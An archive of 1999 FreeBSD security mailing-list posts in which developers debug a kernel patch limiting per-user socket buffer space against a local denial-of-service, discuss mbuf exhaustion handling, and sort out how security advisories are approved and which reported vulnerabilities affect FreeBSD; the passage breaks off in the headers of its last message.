From owner-freebsd-security Sun Sep 5 1:57:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 8EEDF153EC for ; Sun, 5 Sep 1999 01:57:49 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id EAA84842; Sun, 5 Sep 1999 04:57:51 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 04:57:50 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: security@FreeBSD.org Subject: Re: another local DoS fix (PR ???) In-Reply-To: <199909050048.RAA63733@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It would be nice to replace all access of fp with getfp() and have it release. It would make a lot of sense, and perhaps it could also be used with a lock system to make it closer to possible to push down the lock for this area. Processes could share file descriptors in SMP and not have race conditions there! I like lockmgr (maybe I'm insane...) but I'd like to know if there's anything faster that works. Didn't you say something about qlocks a long time ago? I wouldn't mind having a faster lock. -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 4:45:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 1EBE015348 for ; Sun, 5 Sep 1999 04:45:34 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id HAA86864; Sun, 5 Sep 1999 07:44:32 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 07:44:32 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909050110.SAA63819@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 4 Sep 1999, Matthew Dillon wrote: > > : > :Whatever's in login.conf? :) Would you mind helping me out with > :http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails > :in some cases, which I need help tracking down. > :... > : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ > > Hmmm. I see a problem, but it may not be the cause of > your problem. 'ui_proccnt == 0 && ui_sbsize == 0' may not be > sufficient to determine when a uip can be deleted, because a root > process can change it's uid (resulting in the old uip's proccnt > possibly going to 0) and a socket buffer can be set to 0-length > during a shutdown() operation, possibly causing ui_sbsize to go to > zero. Credentials are not the problem since the socket carries them around with it. Where can sb_hiwat be set to 0 in shutdown()? That wouldn't affect ui_sbsize if I missed it, but I'm pretty sure Id idn't miss it. > > Thus both fields may end up zero, a reference to the uip > may remain associated with the socket, and chgproccnt may > free the underlying uip. I don't think this can happen. > > I think what you need is a direct pointer reference to > the uip from the socket. This would require a ui_refcount > be kept on the uip, since ui_proccnt isn't really a > general ref count in of itself. > > I suspect that you may still hit the KASSERT, that there > is something we are still missing, but this should help. I still need to get that part working. Now I'm running into the problem (without these patches) that I get malloc: wrong bucket often, and I can't figure out why > > -Matt > Matthew Dillon > > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 4:52: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 464B315398 for ; Sun, 5 Sep 1999 04:51:58 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id HAA86911; Sun, 5 Sep 1999 07:49:59 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 07:49:59 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909050120.SAA63930@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 4 Sep 1999, Matthew Dillon wrote: > > Oh wait, I don't know which KASSERT() you were refering to. > > If you were refering to the first one (uip != NULL), I think it can occur as > I say. If it is refering to the second one, (uip->ui_sbsize >= 0), > then I'm not sure. That's the one I meant. > > Either way I would get rid of chgsbsize() and instead change the chgproccnt() > function to take a third argument, or make it even more general by passing > a field type and a delta to allow it to be scaled to other things. Probably a good idea, and I'll see how it works after I get the KASSERT() to stop tripping. > > It may be as simple as the KASSERT winding up being wrong. Doesn't seem like it at all. > > I would also instrument the panic portion of the KASSERT to > display more information, such as value of 'diff' and the > old value of ui_sbsize when uip is not NULL. That may make the > problem more obvious. I've gdb'd every crash and it's been something like ui_sbsize = 0x1234 delta = -0x2000. > > -Matt > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 4:54:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id E052C14DF7 for ; Sun, 5 Sep 1999 04:54:31 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id HAA87024; Sun, 5 Sep 1999 07:54:40 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 07:54:40 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Garrett Wollman Cc: freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909050312.XAA26309@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 4 Sep 1999, Garrett Wollman wrote: > < said: > > >> [I wrote:] > >> What's not clear is: > >> > >> 1) At what level do you impose this limit? > > > Resource limit, definitely. > > You totally missed the point. Did you mean at socket creation time/sb allocation time, or actual _usage_ when the mbufs are being taken up? > > >> 2) Should the limit be statistical or exact? > > > Well, I have it exact it would seem. > > So you clearly haven't actually thought about what the right answer > is. > > >> 3) What is a sensible default value? > > > Whatever's in login.conf? > > Not at all helpful. How about the size necessary for send + rcv space for a TCP socket * number of maximum user processes? > > > http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails > > in some cases, which I need help tracking down. > > I think if you're not going to implement the Right Thing, there's no > sense adding all that complexity -- just make a per-socket limit, and > require the sysadmin to tune his kernel to match the resource limits > established. Err... But some users need lots of of file descriptors and/or processes. That would still leave this hole open. > > -GAWollman > > -- > Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same > wollman@lcs.mit.edu | O Siem / The fires of freedom > Opinions not those of| Dance in the burning flame > MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 9:38:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 54A9614E77; Sun, 5 Sep 1999 09:38:20 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id JAA68325; Sun, 5 Sep 1999 09:37:48 -0700 (PDT) (envelope-from dillon) Date: Sun, 5 Sep 1999 09:37:48 -0700 (PDT) From: Matthew Dillon Message-Id: <199909051637.JAA68325@apollo.backplane.com> To: "Brian F. Feldman" Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> old value of ui_sbsize when uip is not NULL. That may make the :> problem more obvious. : :I've gdb'd every crash and it's been something like ui_sbsize = 0x1234 :delta = -0x2000. : : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ 0x1234 could be an indication of a reference to a data structure which has been freed. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 11:43:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id E63D414E51; Sun, 5 Sep 1999 11:43:32 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id OAA28577; Sun, 5 Sep 1999 14:42:44 -0400 (EDT) (envelope-from wollman) Date: Sun, 5 Sep 1999 14:42:44 -0400 (EDT) From: Garrett Wollman Message-Id: <199909051842.OAA28577@khavrinen.lcs.mit.edu> To: "Brian F. Feldman" Cc: Garrett Wollman , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: References: <199909050312.XAA26309@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Err... But some users need lots of of file descriptors and/or processes. > That would still leave this hole open. Don't give those resources to untrusted users. (And while you're at it, how about fixing the code that causes a panic here rather than failing gracefully?) -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 17:30:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 88A7014CEF for ; Sun, 5 Sep 1999 17:30:55 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id UAA99066; Sun, 5 Sep 1999 20:28:22 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sun, 5 Sep 1999 20:28:22 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Matthew Dillon Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909051637.JAA68325@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 5 Sep 1999, Matthew Dillon wrote: > > :> old value of ui_sbsize when uip is not NULL. That may make the > :> problem more obvious. > : > :I've gdb'd every crash and it's been something like ui_sbsize = 0x1234 > :delta = -0x2000. > : > : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ > > 0x1234 could be an indication of a reference to a data structure > which has been freed. That would be 0xdeadc0de, but it wasn't actually 0x1234. It was something else somewhat similar. After tracking down the problem k6_mem.c has, I may look much more into this. > > -Matt > Matthew Dillon > > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:29:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 0B92E1575A for ; Sun, 5 Sep 1999 19:28:59 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33033; Sun, 5 Sep 1999 20:28:10 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01416; Sun, 5 Sep 1999 20:27:13 -0600 (MDT) Message-Id: <199909060227.UAA01416@harmony.village.org> To: spork Subject: Re: Security Alerts Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 03 Sep 1999 13:44:42 EDT." References: Date: Sun, 05 Sep 1999 20:27:13 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message spork writes: : I've been reading bugtraq more often that this list (2500 messages in this : box..) and following a few FBSD exploits there (/etc/security / fts, the : mbuf DoS) and also a few where it's unclear as to whether FBSD is affected : (libtermcap, wu-ftpd, proftpd). The security officer handles this. Some advisories have been issued, more to follow. We don't issue advisories for problems that don't impact us. This means there will be no libtermcap nor cron because FreeBSD is not vulnerable to those exploits. : So what I'm wondering is whether the project is in need of someone to : digest, discuss, and regurgitate some of these things into security : advisories. I personally can appreciate the fact that an ordinary user or : admin might not be able to follow every bug that comes up on bugtraq or on : this list, and the idea of a central repository on the FreeBSD webpage : that is kept up to date and includes third-party software (esp. if it's in : common use, like wu) seems like a good one. Yes. It is an excellent idea. I'm looking for ways to help in advising on third party software used with freebsd, like wuftpd. : So I'm volunteering to write this stuff up, all I need is the go-ahead : from someone... Send me something privately and I'll let you know if you are on the right track. Warner FreeBSD Security Officer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:31:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 06D75157E1 for ; Sun, 5 Sep 1999 19:31:51 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33037; Sun, 5 Sep 1999 20:28:54 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01429; Sun, 5 Sep 1999 20:28:00 -0600 (MDT) Message-Id: <199909060228.UAA01429@harmony.village.org> To: dan.langille@dvl-software.com Subject: Re: Security Alerts Cc: spork , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sat, 04 Sep 1999 08:20:59 +1200." <199909032020.PAA24920@metis.host4u.net> References: <199909032020.PAA24920@metis.host4u.net> Date: Sun, 05 Sep 1999 20:28:00 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199909032020.PAA24920@metis.host4u.net> "Dan Langille" writes: : Just do it. The good thing about services such as the one you are : proposing is that it doesn't need anyone's "approval". If you think it's a : good idea, do it. People will use it. [If a place can't be found within the : FreeBSD pages, then I'll be quite happy to publish them on The : FreeBSD Diary.] Wrong. If it relates to Security and a FreeBSD stamp of approval, it needs my stamp of approval. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:33:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id D80041575A for ; Sun, 5 Sep 1999 19:33:16 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33056; Sun, 5 Sep 1999 20:32:56 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01466; Sun, 5 Sep 1999 20:32:03 -0600 (MDT) Message-Id: <199909060232.UAA01466@harmony.village.org> To: "Jordan K. Hubbard" Subject: Re: Security Alerts Cc: spork , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 03 Sep 1999 16:36:39 PDT." <67508.936401799@localhost> References: <67508.936401799@localhost> Date: Sun, 05 Sep 1999 20:32:03 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <67508.936401799@localhost> "Jordan K. Hubbard" writes: : More than actually generating advisories, something which our security : officers do a pretty reasonable job on, what we *really* need is : someone to test the existing advisories/random reports/etc and figure : out which exploits or DoS attacks are actually genuine. Quite a bit : of stuff gets sent to the security list and quite a bit of it often : has no applicability whatsoever to FreeBSD, leading to a situation : where security officers put it on the "test this at some point" pile : and that pile can get pretty deep. When faced with a "this has been : tested and the following releases of FreeBSD are vulnerable" sort of : message, however, they know that it's clearly a matter for immediate : attention and it gets "escallated" quite a bit. Yes. This is true. The "it might be a problem" messages tend to take too long, especially when it impacts -stable and not -current. I test as many of them as I can on FreeBSD-current, but testing them on -stable is much harder for me to do. Things have also been clogged up for me of late due to a variety of reasons which I've taken care of. The rest of the security backlog should be finished up this weekend... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:35:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7702F1580D for ; Sun, 5 Sep 1999 19:35:15 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33065; Sun, 5 Sep 1999 20:34:56 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01490; Sun, 5 Sep 1999 20:34:03 -0600 (MDT) Message-Id: <199909060234.UAA01490@harmony.village.org> To: "N. N.M" Subject: Re: Tracing open ports on FreeBSD Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sat, 04 Sep 1999 04:28:53 PDT." <19990904112855.43007.qmail@hotmail.com> References: <19990904112855.43007.qmail@hotmail.com> Date: Sun, 05 Sep 1999 20:34:03 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990904112855.43007.qmail@hotmail.com> "N. N.M" writes: : 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly : listening on my FreeBSD box. I don't know how this has happened, as they : were not open before. They are related to X11 as far as I know. But I had : already disabled XDM in /etc/ttys file. Could anybody tell me how I can : disable this stuff? Or how they could get opened and listening? ssh will create these. : 2) This is some time that two UDP ports have got opened as well. Again, I : don't have any idea on how they have got enabled. The ports are 1352 and : 2699. Generally, how I can trace when a port gets suddenly enabled? That I can't help you with. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:38: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4292B15814 for ; Sun, 5 Sep 1999 19:37:57 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33077; Sun, 5 Sep 1999 20:37:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01522; Sun, 5 Sep 1999 20:36:45 -0600 (MDT) Message-Id: <199909060236.UAA01522@harmony.village.org> To: Paul Hart Subject: Re: No patch yet for fts? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 01 Sep 1999 10:49:08 MDT." References: Date: Sun, 05 Sep 1999 20:36:45 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Paul Hart writes: : It looks like we've got kernel patches now to prevent core dumps from : following symbolic links which is excellent, but has anyone looked at : committing OpenBSD's fts(3) patch? See: A similar patch has been committed. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:40:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.actrix.gen.nz (mail2.actrix.gen.nz [203.96.16.37]) by hub.freebsd.org (Postfix) with ESMTP id E11ED1583A for ; Sun, 5 Sep 1999 19:40:11 -0700 (PDT) (envelope-from junkmale@xtra.co.nz) Received: from actrix.gen.nz (www@lemuria.actrix.gen.nz [203.96.16.20]) by mail.actrix.gen.nz (8.9.1/8.9.1) with SMTP id OAA29804; Mon, 6 Sep 1999 14:38:49 +1200 (NZST) From: "Dan Langille" Reply-To: junkmale@xtra.co.nz To: Warner Losh , spork , freebsd-security@FreeBSD.ORG Date: Mon, 6 Sep 1999 14:38:49 nzst Subject: Re: Security Alerts X-Mailer: DMailWeb Web to Mail Gateway 2.1t, http://netwinsite.com/top_mail.htm Message-id: <37d32939.64a9.0@actrix.gen.nz> X-User-Info: 202.37.52.5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: >In message <199909032020.PAA24920@metis.host4u.net> "Dan Langille" writes: >: Just do it. The good thing about services such as the one you are >: proposing is that it doesn't need anyone's "approval". If you think it's a >: good idea, do it. People will use it. [If a place can't be found within the >: FreeBSD pages, then I'll be quite happy to publish them on The >: FreeBSD Diary.] > >Wrong. If it relates to Security and a FreeBSD stamp of approval, it >needs my stamp of approval. Fair enough. I wasn't considering any aspect of "official" whatsoever. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:41:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 51C0C1580D for ; Sun, 5 Sep 1999 19:41:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33096; Sun, 5 Sep 1999 20:40:44 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01554; Sun, 5 Sep 1999 20:39:49 -0600 (MDT) Message-Id: <199909060239.UAA01554@harmony.village.org> To: Mohacsi Janos Subject: Re: amd buffer overflow some Linuxes, in FreeBSD too? Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 02 Sep 1999 10:36:49 +0200." References: Date: Sun, 05 Sep 1999 20:39:49 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mohacsi Janos writes: : Hi, : There are some reports that amd is vulnerable to stack overflow : remote root exploit attack in some Linux distribution. : http://linuxtoday.com/stories/9440.html : Can somebody check whether the FreeBSD version also vulnerable? As : I see on the amd-dev list the amq -M code is the origin of the remote root : exploit. Fixes have been committed for this to FreeBSD -current, 3.2-stable and 2.2.8-stable. Advisory is in the works. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 19:44:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 09F7C14FC4 for ; Sun, 5 Sep 1999 19:44:12 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA33109; Sun, 5 Sep 1999 20:43:12 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA01593; Sun, 5 Sep 1999 20:42:19 -0600 (MDT) Message-Id: <199909060242.UAA01593@harmony.village.org> To: junkmale@xtra.co.nz Subject: Re: Security Alerts Cc: spork , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Mon, 06 Sep 1999 14:38:49 +0100." <37d32939.64a9.0@actrix.gen.nz> References: <37d32939.64a9.0@actrix.gen.nz> Date: Sun, 05 Sep 1999 20:42:19 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37d32939.64a9.0@actrix.gen.nz> "Dan Langille" writes: : Fair enough. I wasn't considering any aspect of "official" whatsoever. If it is on the FreeBSD web pages, I really think that I'd at least need to approve the effort. I have no problem with doing that, I just don't want to read about it in a public list w/o even a heads up being sent to me. It lacks common courtesy. Maybe I'm just being grumpy. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 20:33:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from oracle.dsuper.net (oracle.dsuper.net [205.205.255.1]) by hub.freebsd.org (Postfix) with ESMTP id A875F15437; Sun, 5 Sep 1999 20:33:16 -0700 (PDT) (envelope-from bmilekic@dsuper.net) Received: from oracle.dsuper.net (oracle.dsuper.net [205.205.255.1]) by oracle.dsuper.net (8.9.3/8.9.3) with ESMTP id XAA22849; Sun, 5 Sep 1999 23:33:06 -0400 (EDT) Date: Sun, 5 Sep 1999 23:33:06 -0400 (EDT) From: Bosko Milekic To: freebsd-hackers@freebsd.org Cc: freebsd-security@freebsd.org Subject: mbuf shortage situations Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This post is somewhat in relation to the "local DoS" thread started on --security a few days ago. To slightly put things back into context: The panic() signaling "out of mbuf clusters" is a result of the initial MGET failing, calling m_retry, and failing again. Since we seem to be okay with waiting (e.g.: M_WAIT), and we fail in getting an mbuf cluster, m_retry panic()s. As far as what I've understood from glancing at some OpenBSD and NetBSD code, I'm pretty sure that they both handle this situation the same way we handle it if the m_retry is called with M_DONTWAIT, which is to return null to MGET, which would consequently set the mbuf structure pointer (in this case, struct mbuf *m) to null. This would probably result in packet loss. The only reason that I see for which we would actually panic() in this situation (as opposed to suffer the packet loss) is if we get to the point where we're losing packets because some script kid starts up something that will eat up sockbuf space and continuously fork, then we would lose all remote access to the machine in question (since all packets would be dropped) and we wouldn't really mind a panic() for obvious practical reasons. In any case, I, personally, would prefer to suffer packet loss as opposed to a panic (especially now that Brian is in the process of writing diffs that will allow us to limit socket buffer space per UID through login.conf!) Having MGET store that null (e.g. fail as opposed to panic) on a M_WAIT seems fairly easy to fix, and would probably require some patching that would ensure that the packet loss is handeled relatively 'cleanly' (probably some debugging), but I wouldn't mind doing this. However, I'd like to know if there are objections to doing this or, in fact, if there are any suggestions on how to handle mbuf shortage situations (aside from just limiting -- although limiting is in itself a good solution and I'm glad that Brian F. is working on that). Cheers, Bosko. /* * Bosko Milekic http://www.dsuper.net/~bmilekic/ * "A method of solution is perfect if we can foresee from the start, and * even prove, that by following that method we shall obtain our aim." */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 5 21:16: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 2E40814DE6; Sun, 5 Sep 1999 21:16:00 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id VAA70569; Sun, 5 Sep 1999 21:14:42 -0700 (PDT) (envelope-from dillon) Date: Sun, 5 Sep 1999 21:14:42 -0700 (PDT) From: Matthew Dillon Message-Id: <199909060414.VAA70569@apollo.backplane.com> To: "Brian F. Feldman" Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to 